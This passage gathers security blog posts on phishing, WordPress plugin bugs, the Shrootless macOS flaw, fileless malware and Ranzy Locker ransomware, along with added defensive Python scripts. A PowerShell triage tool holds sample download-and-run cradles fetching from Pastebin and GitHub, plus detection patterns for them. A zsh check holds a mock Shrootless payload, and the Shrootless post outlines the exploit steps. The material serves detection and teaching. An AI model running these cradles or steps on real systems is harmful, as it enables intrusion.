IT NEWS

Tips to protect your data, security, and privacy from a hands-on expert

This post was authored by one of the most active helpers on the Malwarebytes forums who wishes to remain anonymous.

Back in the early days of personal computing, perhaps one of the only real concerns was data loss from a drive failure. That risk still exists, but we all face many other threats today too.

There are rootkits, Trojans, worms, viruses, ransomware, phishing, identity theft, and social engineering to worry about. And that’s not a comprehensive list.

So how can you avoid becoming a victim?

Security tips

Practice good security habits: slow down and think before you click. Use a strong, unique password for every account and site. A long passphrase that cannot be found in a dictionary is one way to get a strong password, and a password manager is highly recommended so that you do not have to remember them all. Wherever it is offered, turn on multi-factor authentication (MFA) to protect your accounts. Keep your operating system and installed software up to date, and check regularly with your operating system, device, and software vendors for security updates.

Pay close attention to the license agreements and installation screens when installing anything. If an installation screen offers you Custom or Advanced installation options, it is a good idea to select these as they will typically disclose what other third party software will also be installed. Take great care in every stage of the process and every offer screen, and make sure you know what it is you’re agreeing to before you click “Next.”

Avoid using Peer-to-Peer (P2P) file-sharing programs if possible. Likewise, avoid keygens, cracks, and other pirated software that can often compromise your data, privacy, or both.

Today, content blockers have become essential for cutting down ads, Trojans, phishing pages, and other undesirable content that an antivirus product alone may not cover. Disabling browser push notifications is also recommended, as they have become a source of abuse. Hover over links and review where they actually go before you click; never click blindly. Consider using DuckDuckGo or StartPage as your home page and search provider to improve your security and privacy.

Whether it’s your email, phone, messenger, or other applications, always be alert for someone trying to trick you into clicking a link or replying to a message. If the sender is not in your address book or contacts list, that is all the more reason to be suspicious. Never open unexpected email attachments, no matter how enticing, and be cautious even when they appear to come from friends or family, since their accounts may be compromised. If possible, save the attachment first and have a service such as VirusTotal scan it before you open it. Two caveats: a clean result is not proof that a file is safe, only that no engine recognised it at that moment, and uploading a file shares it with the service and its partners, so for confidential documents look up the file’s hash rather than uploading the file itself.
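The following Python script is an added example, not part of the original post and not a Malwarebytes tool: it automates the advice above about checking where a link really goes. It pulls every link out of an HTML message body and flags the patterns that most often betray a phishing link: an IP address instead of a hostname, plain http, punycode (internationalised) domain labels, and display text that names one domain while the href points to another. The e-mail body and all domains in it are constructed for the example, and the "registrable domain" logic is a deliberate simplification (last two labels) that a production version would replace with a public-suffix-list lookup.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample e-mail body (not a real message): one honest link, three deceptive ones.
SAMPLE_HTML = """
<p>Your statement is ready: <a href="https://www.example-bank.com/login">https://www.example-bank.com/login</a></p>
<p>Verify now: <a href="http://198.51.100.23/verify">https://www.example-bank.com/verify</a></p>
<p>Account notice: <a href="https://example-bank.com.secure-login.example.net/">example-bank.com</a></p>
<p>Update required: <a href="https://xn--80ak6aa92e.com/">https://www.example-bank.com</a></p>
"""

# Display text that itself looks like a URL or bare domain (it then has to agree with the href).
URLISH = re.compile(r"^(?:https?://)?(?:[\w-]+\.)+[a-z]{2,}(?:[/?#]\S*)?$", re.IGNORECASE)


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(html):
    parser = _LinkCollector()
    parser.feed(html)
    parser.close()
    return parser.links


def host_of(url):
    """Hostname of a URL or bare domain, lower-cased ('' if none)."""
    if "://" not in url:
        url = "https://" + url
    return (urlsplit(url).hostname or "").lower()


def registrable(host):
    # Simplification: treat the last two labels as the registrable domain.
    # Real code should consult the public suffix list (co.uk and friends have three).
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_link(href, text):
    """Return the reasons a link is suspicious (empty list = nothing found)."""
    reasons = []
    host = host_of(href)
    if urlsplit(href).scheme.lower() == "http":
        reasons.append("plaintext-http")
    if is_ip_literal(host):
        reasons.append("ip-literal")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode")  # IDN label: a homograph candidate, decode and inspect it
    if URLISH.match(text):
        shown = host_of(text)
        if shown and registrable(shown) != registrable(host):
            reasons.append("display-mismatch")  # the text names one domain, the href goes elsewhere
    return reasons


def audit(html):
    """Findings for every suspicious link in an HTML body, in document order."""
    findings = []
    for href, text in extract_links(html):
        reasons = check_link(href, text)
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_HTML):
        print(f"{', '.join(finding['reasons']):40} {finding['text']!r} -> {finding['href']}")
```

Run it as-is to see the three deceptive links reported; point audit() at the decoded HTML part of a saved message to use it on real mail. A link with no findings is not thereby safe: the check only catches the sloppy cases, which is exactly why reading the destination before clicking remains worth the habit.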

Make sure you are backing up your data frequently, and validate that the data can actually be restored. It is highly recommended that you back up all of your essential data to an external device such as a USB drive, and that you do not leave the backup drive connected to the system. Connect it to run the backup, and disconnect it once the backup has completed. If your computer were to become infected while the backup drive was connected, the infection could infect, delete, or encrypt your backup, rendering it useless. Never connect the backup drive to a computer you suspect might be infected until you have cleaned the computer or device.

Support forums such as Malwarebytes Forums and a few others have members or staff that are highly trained and can assist you further if you have specific questions or issues about your devices or security, or would like more details on any particular information shared in this article.

URL links with further information or access to the programs mentioned:

Malwarebytes Support Forum
https://forums.malwarebytes.com

Tips to help protect from infection
https://forums.malwarebytes.com/topic/258363-tips-to-help-protect-from-infection/

Privacy – protecting your digital footprint
https://www.sans.org/newsletters/ouch/ouch-april-2021/

Do I need a Windows Registry Cleaner?
https://forums.malwarebytes.com/topic/126481-do-i-need-a-windows-registry-cleaner/

Backup your data
https://forums.malwarebytes.com/topic/136226-backup-software/

Content blockers

Malwarebytes Browser Guard
https://www.malwarebytes.com/browserguard/

uBlock Origin

NoScript Security Suite
https://addons.mozilla.org/en-US/firefox/addon/noscript/

Web Browser recommendations
https://www.privacytools.io/browsers/

Delete cookies automatically | Cookie AutoDelete plugin

https://github.com/Cookie-AutoDelete/Cookie-AutoDelete
https://chrome.google.com/webstore/detail/cookie-autodelete/fhcgjolkccmbidfldomjliifgaodjagh
https://addons.mozilla.org/en-US/firefox/addon/cookie-autodelete/

Browser push notifications: a feature asking to be abused
https://blog.malwarebytes.com/security-world/technology/2019/01/browser-push-notifications-feature-asking-abused/

The post Tips to protect your data, security, and privacy from a hands-on expert appeared first on Malwarebytes Labs.

Update your OptinMonster WordPress plugin immediately

WordPress, the incredibly popular content management platform, is currently dealing with a nasty plugin bug that lets attackers place code on affected sites, for example to redirect visitors.

What is a WordPress plugin?

Like most blogging platforms, WordPress allows you to change its default functionality. This is done by adding bits of kit called plugins. Some come from WordPress itself, others are created and maintained by third parties. Any plugin can potentially be unsafe, poorly coded, or compromised in some way. It is also entirely possible for rogues to write their own innocent-looking plugin and cause chaos.

Plugins are often in the news for these kinds of problems. Just this month, we covered a WordPress plugin susceptible to multiple vulnerabilities. Last month, it was a plugin leaving shoppers vulnerable to cross site scripting bugs and a form of JavaScript injection. There are so many plugins that it’s a surefire bet another plugin will be the latest compromise before long. And even when it’s not possible to be 100% sure a plugin was involved in an attack, you can end up with a bad situation very quickly. Shall we see what’s happened this time?

Bug causes problems for up to 1 million sites

Yes, as many as 1 million WordPress sites run the plugin at the heart of this one. OptinMonster is a tool designed to make your site “sticky”: keep people around for longer, convert interest to sales, sign them up to newsletters, build up elements of your site, and more.

This plugin relies on API endpoints to do its job. An API is an Application Programming Interface, and you can read a fantastic plain-English description of what an API is and does here.

Sadly, some of the endpoints were not properly protected, so attackers holding API keys issued for the OptinMonster service could get up to no good: changing account settings, or placing malicious code on the site without a visitor’s knowledge.

CVE-2021-39341

The bug, tracked as CVE-2021-39341 and discovered at the end of September, has been addressed by the OptinMonster developers. Stolen API keys have been invalidated, and a patch was released on October 7. More updates may appear over the next few weeks.

What should I do if I have OptinMonster on my website?

If your API key has been revoked, you’ll have to create a new one. You should also ensure your plugin is kept up to date. In fact, you should be doing this for all of your plugins. It may be worth checking if they’re still maintained, and browsing the latest reviews to see if people are suddenly complaining about peculiar activity.

If you have plugins installed which you don’t use at all, or only very rarely, it may be worth having a spring clean. Often we rush to install dozens of plugins on a new website, and before we know it, we’ve forgotten what half of them are. There they sit, for months or years, just waiting for a juicy vulnerability to come along. Why take the risk?

There are a number of ways to keep your WordPress site safe from harm where plugins are concerned. Our advice is to devote some time to digging through the weeds and seeing exactly what you have lurking in the undergrowth.
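As an added example (not the post's own, and not an OptinMonster or WordPress tool), here is a Python audit of the plugin hygiene the post recommends: plugins with an update pending, plugins that are installed but inactive, and plugins whose last release is old enough to suspect they are no longer maintained. The sample input stands in for `wp plugin list --format=json` (field names follow WP-CLI; the plugin names and versions are made up) and for the `last_updated` value that the wordpress.org plugin information API returns per slug; in real use you would fetch both.

```python
import json
from datetime import date, datetime

# Constructed stand-in for `wp plugin list --format=json` (field names follow WP-CLI;
# plugin names and versions are made up for this example).
SAMPLE_PLUGIN_LIST = json.dumps([
    {"name": "optinmonster", "status": "active", "update": "available", "version": "2.6.4"},
    {"name": "hello", "status": "inactive", "update": "none", "version": "1.7.2"},
    {"name": "legacy-gallery-widget", "status": "active", "update": "none", "version": "0.9"},
    {"name": "akismet", "status": "active", "update": "none", "version": "4.2.1"},
])

# Constructed stand-in for the `last_updated` field of the wordpress.org plugin information API
# (action=plugin_information, one request per slug); the dates are made up.
SAMPLE_LAST_UPDATED = {
    "optinmonster": "2021-10-07",
    "hello": "2021-06-01",
    "legacy-gallery-widget": "2018-05-14",
    "akismet": "2021-10-01",
}

AUDIT_DATE = date(2021, 10, 29)  # "today" for the sample run


def parse_plugin_list(json_text):
    """Parse WP-CLI's JSON plugin listing into a list of dicts."""
    return json.loads(json_text)


def audit_plugins(plugins, last_updated, today, stale_days=730):
    """Sort installed plugins into the buckets the post says to look at."""
    report = {"update_available": [], "inactive": [], "stale": [], "unknown_maintenance": []}
    for plugin in plugins:
        name = plugin["name"]
        if plugin.get("update") == "available":
            report["update_available"].append(name)
        if plugin.get("status") == "inactive":
            report["inactive"].append(name)  # unused code is still attack surface: remove it
        stamp = last_updated.get(name)
        if stamp is None:
            report["unknown_maintenance"].append(name)  # not on wordpress.org: ask the vendor
        elif (today - datetime.strptime(stamp, "%Y-%m-%d").date()).days > stale_days:
            report["stale"].append(name)  # no release in two years: possibly abandoned
    return report


def remediation_commands(report):
    """WP-CLI commands that act on the audit: update what is outdated, delete what is unused."""
    commands = [f"wp plugin update {name}" for name in report["update_available"]]
    commands += [f"wp plugin delete {name}" for name in report["inactive"]]
    return commands


if __name__ == "__main__":
    report = audit_plugins(parse_plugin_list(SAMPLE_PLUGIN_LIST), SAMPLE_LAST_UPDATED, AUDIT_DATE)
    for bucket, names in report.items():
        print(f"{bucket:20} {', '.join(names) or '-'}")
    print("\n".join(remediation_commands(report)))
```

The stale threshold is a judgement call: a plugin can be finished rather than abandoned, so treat "stale" as a prompt to check the support forum and changelog, not as an automatic delete. Rotating a revoked API key is a manual step the script cannot do for you.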


The return of the Malwarebytes CrackMe

This blog post was authored by Hasherezade

Twice in the past (2017, 2018) we published a Capture-The-Flag challenge dedicated to aspiring malware analysts. Each time it was a Windows executable with up to three stages to break in order to get the final flag. The goal of the crackme is to give contestants an exercise in understanding and overcoming techniques commonly present in real-life malware, presented on a harmless example.

After a long break, we decided to resume our small contest, and possibly make it an annual event. Without further ado, we present the Malwarebytes CrackMe number 3!

Rules of the contest

The rules remain mostly unchanged since the second edition. As before we have two parallel tracks of the contest:

  1. The fastest solve. The three earliest submitted flags win. The flag should be submitted along with (minimalist) notes about the steps taken to find it. (No detailed write-up is required.) Any updates about the known winners in this category will be appended to this post.
  2. The best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show their method of solving the CrackMe, as well as explain the techniques used in the challenge. Write-up submissions close two weeks after the start of the challenge.

In each track we will select three winners that will be rewarded with unique Malwarebytes swag. The first place winner in each category will additionally get any IT-related book of their choice. All the solvers are going to be listed in our hall of fame.

The flag is in format: flag{...}

Submissions to both contests should be sent as a private message to the Twitter account: @hasherezade.

Three weeks after the challenge started we will publish the closing summary, along with the detailed walk-through, provided by the author.

WARNING: We are sorry, but Malwarebytes employees and people who had access to the CrackMe before the official publication are not allowed to participate.

The application

The application is a Windows executable. It was tested on Windows 8 and above.

WARNING: since the CrackMe contains techniques similar to those used in malware, it may be flagged by various AV products. These are known false positives. We recommend running it in a VM with Windows Defender disabled.

You can download it here.


Best of luck, and have fun!

Hall of fame

We already have the first winner in the category “the fastest solve”:

  1. 🥇 @nazywam

Who will be next?


Shrootless: Microsoft finds Apple macOS vulnerability

Microsoft researchers have discovered a vulnerability in macOS, dubbed Shrootless, that can allow attackers to bypass System Integrity Protection (SIP) and perform actions that are normally blocked even for the root user, such as installing rootkits on vulnerable devices.

Microsoft reported the Shrootless attack to Apple’s security team earlier this year, together with a proof-of-concept that showed how the bug could be abused to install a malicious kernel extension (rootkit).

What is SIP?

SIP, also known as “rootless”, is designed to lock down the system even against the root user by leveraging the Apple sandbox to protect the entire platform. Bypassing SIP therefore hands an attacker who already runs as root the last piece of control they lacked: they can modify protected system files and load code that the protection would otherwise block.

Step by step, Apple has hardened SIP over the years against attacks by improving and finetuning the restrictions. One of the most effective SIP restrictions is the filesystem restriction. Without these restrictions, an attacker would be able to access and drop files in an area of the file system that is not intended for application files. The amount of damage an attacker can do to a device’s critical components is directly based on their ability to write unrestricted data to disk.

Since the filesystem restrictions are so powerful, Apple had to implement some exceptions. One of those exceptions is the daemon system_installd, which has the powerful com.apple.rootless.install.inheritable entitlement. With this entitlement, any child process of system_installd would be able to bypass SIP filesystem restrictions altogether.

The vulnerability

The Shrootless vulnerability could be used by an attacker to modify protected parts of the file system by abusing inherited permissions. Microsoft shared its findings with Apple through Coordinated Vulnerability Disclosure (CVD). The vulnerability exists in the macOS Big Sur and Monterey operating systems and was patched by Apple on October 25, 2021.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Shrootless is listed under CVE-2021-30892.

The researchers found that during the installation process of a new application, an attacker could hijack the installation process by creating a specially crafted post-installation script and placing it in the location where the installation process looks for the post-installation script.

The gritty details

The method to use this vulnerability is pretty straightforward.

  • Download an Apple-signed package (for example with wget) that is known to contain a post-install script. Installing an Apple-signed package (.pkg file) invokes system_installd, which performs the installation.
  • Plant a malicious /etc/zshenv that checks its parent process; if the parent is system_installd, the commands it runs inherit the entitlement and can write to SIP-protected locations. This works because, if the package contains a post-install script, system_installd runs it with the default shell, which on macOS is zsh, and when zsh starts it automatically executes the commands in /etc/zshenv if that file exists.
  • Invoke the installer utility to install the package. This invokes system_installd; because the package has a post-install script, zsh is started and executes the commands in the planted file.

This is how Shrootless bypasses SIP. Note what the attacker needs to begin with: write access to /etc/zshenv, which on macOS already requires root. Shrootless does not hand out root; what it adds is the ability to modify SIP-protected parts of the system that even root is normally barred from touching, such as installing a malicious kernel extension (rootkit).

Mitigation

The easiest and best way to avoid falling victim to this vulnerability is to update to macOS Big Sur 11.6.1 or macOS Monterey 12.0.1, or later.
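A defensive check for the conditions described above, written for this page as an added example (not Microsoft's or Apple's code): it compares the macOS version against the fixed releases and reviews the system-wide zsh startup files for the traits the post describes, a file that inspects its parent process, names system_installd, or reaches into SIP-protected paths. The Big Sur 11.6.1 threshold is from the post; the Monterey 12.0.1 threshold is taken from Apple's advisory for CVE-2021-30892 and is an assumption of this example, as is the premise that a stock macOS install ships no /etc/zshenv. The sample startup-file content is constructed to exercise the checks and is not the proof-of-concept.

```python
import re
import subprocess
from pathlib import Path

# Fixed releases. 11.6.1 comes from the post; 12.0.1 is taken from Apple's advisory for
# CVE-2021-30892 (an assumption of this example). Catalina is out of scope here.
FIXED = {11: (11, 6, 1), 12: (12, 0, 1)}

# Startup files zsh reads system-wide. Assumption: a stock macOS install has /etc/zprofile
# and /etc/zshrc but no /etc/zshenv, so its mere presence deserves a look.
ZSH_SYSTEM_FILES = ("/etc/zshenv", "/etc/zprofile", "/etc/zshrc", "/etc/zlogin", "/etc/zlogout")

# Traits of the technique described in the post, applied to non-comment text of each line.
SUSPICIOUS = [
    (re.compile(r"system_installd"), "names system_installd"),
    (re.compile(r"\$PPID|ps\s+-o\s+\S*ppid|-p\s+\$PPID"), "inspects its parent process"),
    (re.compile(r"(?<![\w./-])(/System/|/usr/(?!local/)|/bin/|/sbin/)"), "refers to a SIP-protected path"),
]


def version_tuple(text):
    parts = [int(p) for p in text.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_patched(product_version):
    """True if this macOS version carries the fix for CVE-2021-30892."""
    version = version_tuple(product_version)
    if version[0] > max(FIXED):
        return True  # anything newer than the last listed major release
    fixed = FIXED.get(version[0])
    return fixed is not None and version >= fixed


def audit_startup_file(text):
    """Reasons a zsh startup file deserves manual review (empty list = nothing matched)."""
    reasons = []
    for lineno, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # ignore comments
        for pattern, why in SUSPICIOUS:
            if pattern.search(code):
                reasons.append(f"line {lineno}: {why}")
    return reasons


def audit_host(root="/"):
    """Live check for a macOS host: OS version plus every system-wide zsh startup file."""
    findings = []
    try:
        out = subprocess.run(["sw_vers", "-productVersion"], capture_output=True, text=True, check=True).stdout
        if not is_patched(out):
            findings.append(f"macOS {out.strip()} predates the fix for CVE-2021-30892")
    except (OSError, subprocess.CalledProcessError):
        findings.append("could not determine the macOS version (not macOS?)")
    for name in ZSH_SYSTEM_FILES:
        path = Path(root) / name.lstrip("/")
        if not path.exists():
            continue
        if name == "/etc/zshenv":
            findings.append(f"{path} exists (assumed absent on a stock install; review it)")
        for why in audit_startup_file(path.read_text(errors="replace")):
            findings.append(f"{path}: {why}")
    return findings


# Constructed sample with the traits described in the post (not the proof-of-concept).
SAMPLE_ZSHENV = """\
# harmless preamble
export EDITOR=vim
parent=$(ps -o comm= -p $PPID)
[[ $parent == *system_installd* ]] && touch /System/Library/marker
"""

if __name__ == "__main__":
    for finding in audit_host():
        print(finding)
```

Text matching like this is a review aid, not proof of compromise or of its absence: a legitimate admin may well reference /System in a startup file, and a careful attacker can obfuscate. The durable fix is the update; the file review is for deciding whether a host needs forensic attention before it gets one.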

Stay safe, everyone!


What is fileless malware?

Unlike traditional malware, which relies on a file being written to disk, fileless malware is intended to be memory resident only, ideally leaving no trace after execution. The malicious payload lives in the computer’s memory, so in the ideal case nothing is written to the hard drive as a conventional file.

For an attacker, fileless malware has two major advantages:

  • There is no file for traditional, signature-based anti-virus software to scan.
  • There is little on the hard drive for disk forensics to recover (memory forensics and logging of process activity are the counter to this).

As a rule, if malware authors can’t avoid detection by security vendors, they at least want to delay it for as long as possible. Which makes fileless malware a step forward in the arms race between malware and security products.

Is fileless malware new?

Fileless malware attacks have been around for 20 years at least. The first malware to be classified as fileless was the Code Red Worm, which ran rampant in 2001, attacking computers running Microsoft’s Internet Information Services (IIS).

But in the last few years fileless attacks have become more prevalent. Four years ago, the Ponemon Institute’s “The State of Endpoint Security Risk Report” found that 77 percent of successful compromises in 2017 were fileless, and that fileless attacks were ten times more likely to succeed than file-based ones. We noted the trend ourselves, with an overview of fileless attacks in 2018.

How is fileless malware delivered?

In the case of the Code Red Worm, the malware exploited a buffer overflow vulnerability that allowed it to write itself directly into memory. Modern ransomware attacks sometimes rely on PowerShell commands that execute code stored on public websites like Pastebin or GitHub.

Fileless malware attacks have also been seen hiding their code inside existing benign files or invisible registry keys. Some use the so-called CactusTorch framework in a malicious document. And sometimes the malicious code does exist on a hard disk, just not on the one that belongs to the affected computer. For example, “USB thief” resides on infected USB devices installed as a plugin in popular portable software. It gathers information on the targeted system and writes that to the USB device.

How to create fileless malware

Our esteemed colleague Vasilios Hioureas has written a walk-through demonstrating some fileless attacks of his own. His write-up also shows what modern anti-malware solutions need to do to protect users against fileless attacks: dynamically detect malicious activity on the system rather than merely recognising malicious files. Old-school signature matching against files on disk is useless against code that never touches the disk.

What can fileless malware do?

In essence, fileless malware can do anything that “regular” malware can do, but for practical reasons you will often see that there is a limited amount of malicious, fileless code. For more complex programs like ransomware, the fileless malware might act as a dropper, which means the first stage downloads and executes the bigger program which is the actual payload. And, of course, fileless malware can use native, legitimate tools built into a system during a cyberattack.

The most common use cases for fileless malware are:

  • Initial access. The first step of a cyberattack is to gain a foothold on a system, for example with stolen credentials or by exploiting a vulnerability in an exposed service.
  • Credential harvesting. Fileless malware is sometimes used to hunt for credentials, so that the attacker can use alternative entry points or elevate their privileges.
  • Persistence. To ensure they keep access to a compromised system, an attacker might use fileless malware to create a backdoor.
  • Reconnaissance and data exfiltration. An attacker might use fileless malware to hunt for useful information, such as the victim’s network configuration, and send it out.
  • Dropper and/or payload. A dropper downloads and starts other malware (the payload) on a compromised system. The payload may come as a file, or it can be read from a remote server and loaded into memory directly.

Fileless malware detection

So, how can we find these fileless critters? Behavioral analysis and centralized management are key techniques for detecting and stopping fileless malware attacks. Knowing how to identify attacks and having an overview of the attack surface however is easier said than done.

What you need is anti-malware software that uses behavioral analysis, ideally supported by an Artificial Intelligence (AI) component. And for a large attack surface you will need something like a Security Information and Event Management (SIEM) system to tie all the alerts and detections together.

In short, detecting malware is no longer a matter of detecting malicious files, but more and more a matter of detecting malicious behavior.
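To make "detect behaviour, not files" concrete, here is an added Python example (not Malwarebytes code and not the colleague's write-up) that triages process-creation records for the PowerShell download cradles described under "How is fileless malware delivered?": it decodes -EncodedCommand payloads, looks for Invoke-Expression and download calls, for code pulled from Pastebin or GitHub, for hidden windows and execution-policy bypass, and weights a PowerShell process spawned by an Office application. The events are constructed for the example (field names loosely follow Sysmon Event ID 1), and the URLs in them are made up.

```python
import base64
import binascii
import ntpath
import re

# Constructed encoded command in the download-cradle style the post describes (URL is made up).
PLAIN_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/constructed')"
ENCODED = base64.b64encode(PLAIN_CRADLE.encode("utf-16-le")).decode()

# Constructed process-creation records (not captured data); field names loosely follow Sysmon Event ID 1.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Logs"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "Image": PS,
     "CommandLine": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": 'powershell.exe -ExecutionPolicy Bypass -c "iwr https://raw.githubusercontent.com/constructed/repo/main/x.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; -ep and -ExecutionPolicy must not match.
ENCODED_ARG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# (name, weight, pattern) applied to the command line plus any decoded -EncodedCommand payload.
INDICATORS = [
    ("encoded-command", 2, re.compile(r"-(?:e|en|enc|encodedcommand)\s+\S", re.IGNORECASE)),
    ("hidden-window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)),
    ("policy-bypass", 1, re.compile(r"\bbypass\b", re.IGNORECASE)),
    ("invoke-expression", 3, re.compile(r"\biex\b|invoke-expression", re.IGNORECASE)),
    ("download-cradle", 3, re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.IGNORECASE)),
    ("public-paste-site", 2, re.compile(r"pastebin\.com|raw\.githubusercontent\.com|gist\.github", re.IGNORECASE)),
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or malformed."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_event(event):
    """(score, indicator names) for one process-creation record; non-shell images score 0."""
    if ntpath.basename(event["Image"]).lower() not in SHELLS:
        return 0, []
    text = event["CommandLine"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded  # judge the payload, not just the wrapper
    hits = [(name, weight) for name, weight, pattern in INDICATORS if pattern.search(text)]
    if ntpath.basename(event["ParentImage"]).lower() in OFFICE:
        hits.append(("office-parent", 3))  # a document spawning a shell is the classic macro path
    return sum(weight for _, weight in hits), [name for name, _ in hits]


def triage(events, threshold=5):
    """Events scoring at or above the threshold, with the evidence behind each."""
    flagged = []
    for index, event in enumerate(events):
        score, names = score_event(event)
        if score >= threshold:
            flagged.append({"index": index, "score": score, "indicators": names,
                            "parent": ntpath.basename(event["ParentImage"])})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"event {hit['index']} score {hit['score']:2} parent={hit['parent']}: {', '.join(hit['indicators'])}")
```

The weights are illustrative; tune them against your own baseline, because administrators also run encoded and hidden PowerShell. What the example does not show is equally important: the cradle never writes a file, so the evidence here is the command line and the parent-child relationship, which is exactly the telemetry you need to be recording.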

Stay safe, everyone!


Threat profile: Ranzy Locker ransomware

Ranzy Locker ransomware emerged in late 2020, when the variant began to target victims in the United States. According to a flash alert issued by the FBI, unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021, including victims in the construction, academic, government, IT, and transportation sectors. Ranzy Locker is a successor of ThunderX and AKO ransomware.

Ransomware-as-a-Service 

The group behind Ranzy Locker is not very different in its business approach from other “big game” ransomware gangs. The ransomware is made available using the Ransomware-as-a-Service (RaaS) model, which allows the developers to profit from cybercriminal affiliates who deploy it against victims. It also runs a leak site where data stolen from victims who refuse to pay a ransom is published.

RDP again, and Exchange

The business model is no surprise, and neither are the attack methods Ranzy Locker affiliates use to gain initial access. According to the same FBI alert, a majority of victims reported that the threat actors brute-forced Remote Desktop Protocol (RDP) credentials to get into their networks. More recent victims reported that the actors leveraged known Microsoft Exchange Server vulnerabilities and phishing to compromise their networks.

Older, and now less frequent attack methods included malicious spam, and use of the RIG exploit kit, which was previously used to spread Princess ransomware. 

Recognizing Ranzy Locker 

So, how can you tell whether you have been hit by Ranzy Locker rather than one of the many other ransomware variants out there? For starters, you can tell from the header of the ransom note, which is named readme.txt:

---=== Ranzy Locker 1.1 ===---

Attention! Your network has been locked.
Your computers and server are locked now.
All encrypted files have extension: .ranzy

---- How to restore my files? ----

All files on each host in your network encrypted with strongest encryption algorithms
Backups are deleted or formatted, do not worry, we can help you restore your files

Files can be decrypted only with private key - this key stored on our servers
You have only one way for return your files back - contact us and receive universal decryption program

Do not worry about guarantees - you can decrypt any 3 files FOR FREE as guarantee

Some variants also use file extensions for the encrypted files that show Ranzy Locker was at work. Those extensions are .RNZ, .ranzy, and .RANZYLOCKED, but there are also some that are less helpful and add a random 6 character string. 

Behavior 

A typical series of actions performed by Ranzy Locker is:

  • Find and delete shadow volume copies and other recent backups, and disable the Windows recovery environment.
  • Run the encryption process, skipping files with the extensions .exe, .dll, .sys, .ini, .lnk, .key and .rdp, and excluding paths containing strings such as AppData, boot, PerfLogs, PerfBoot, Intel, Microsoft, Windows and Tor Browser.
  • Look for connected machines on the network.
  • Drop the ransom note on the desktop of the affected system.

From what we have noticed, the double-extortion tactic—encrypting and exfiltrating data—is only used on some victims, probably depending on the size of the company and the type of data that was stolen. 

Mitigation 

Based on the behavior of Ranzy Locker, the FBI recommends the following mitigation strategies: 

  • Store regular backups of your data off-site and offline, where attackers can’t reach them.
  • Implement network segmentation, so that an attacker can’t reach all the machines on your network from one compromised foothold.
  • Install and regularly update anti-malware software on all hosts and enable real-time detection. 
  • Install security updates for software, operating systems, and firmware as soon as they are released.
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.  
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.
  • Disable unused remote access ports and monitor remote access logs for any unusual activity.  
  • Consider adding an email banner to emails received from outside your organization.  
  • Disable hyperlinks in received emails.
  • Use multi-factor authentication when logging into accounts or services.

We would like to add brute force protection to that list: lock out or rate-limit repeated failed logins on RDP and other remote access services, and alert on them.
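As an added example of the brute force protection we would add to the list (not FBI guidance and not a Malwarebytes feature), here is a Python detector for RDP password guessing over Windows Security events: it raises an alert when a source IP accumulates a threshold of failed remote logons (event 4625, logon types 10 and 3) inside a sliding window, records how many distinct usernames were tried, and notes whether a successful logon (4624) from the same source followed. The events are constructed for the example; in production you would feed it from the Security log (for example `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625,4624}`) or from your SIEM.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Windows Security log events (not captured data). Field meanings follow 4625/4624:
# LogonType 10 = RemoteInteractive (RDP); 3 = Network, which RDP with NLA records on failure.
BASE = datetime(2021, 7, 12, 3, 14, 0)
ATTACKER = "203.0.113.45"
SPRAYED_USERS = ["administrator", "admin", "backup", "scan", "sql", "test",
                 "user", "guest", "it", "support", "helpdesk", "ftp"]

SAMPLE_EVENTS = [
    {"time": BASE + timedelta(seconds=2 * i), "event_id": 4625, "ip": ATTACKER, "user": u, "logon_type": 10}
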